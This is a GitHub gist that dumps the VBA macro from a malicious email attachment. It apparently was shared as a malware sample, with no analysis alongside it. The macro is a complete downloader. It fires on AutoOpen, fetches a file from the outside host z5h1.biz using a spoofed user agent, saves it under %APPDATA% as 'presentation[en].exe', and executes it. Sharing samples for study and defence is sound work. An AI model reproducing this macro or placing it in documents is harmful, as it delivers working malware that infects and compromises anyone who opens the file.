Skip to content

Instantly share code, notes, and snippets.

@LoadLow
Created November 26, 2014 10:22
Show Gist options
  • Save LoadLow/7b8dfc9dfefc8205ae24 to your computer and use it in GitHub Desktop.
Save LoadLow/7b8dfc9dfefc8205ae24 to your computer and use it in GitHub Desktop.
Hex-dump macro exploit from malicious mail
-------------------------------------------------------------------------------
ThisDocument.cls
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
-------------------------------------------------------------------------------
Module1.bas
Attribute VB_Name = "Module1"
Sub Help()
Start
End Sub
Sub AutoOpen()
Help
End Sub
Sub Start()
Const PositionBegin As Integer = 0
Const EnvVar As String = "APPDATA"
Const UserAg As String = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
Set NewObj = CreateObject("Msxml2.XMLHTTP")
NewObj.Open "POST", "http://z5h1.biz/", False
NewObj.setRequestHeader "User-Agent", UserAg
NewObj.setRequestHeader "Referer", "google.com"
NewObj.send
Dim X
X = NewObj.responseBody
Set Stream = CreateObject("Adodb.Stream")
Stream.Open
Stream.Type = 0 + 1
Stream.Write X
Position = PositionBegin
Dim Appdata As String
Dim PresentationName As String
PresentationName = Environ(EnvVar) & "/presentation[en].exe"
Stream.SaveToFile PresentationName, 1 + 1
Shell PresentationName, vbNormalNoFocus
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment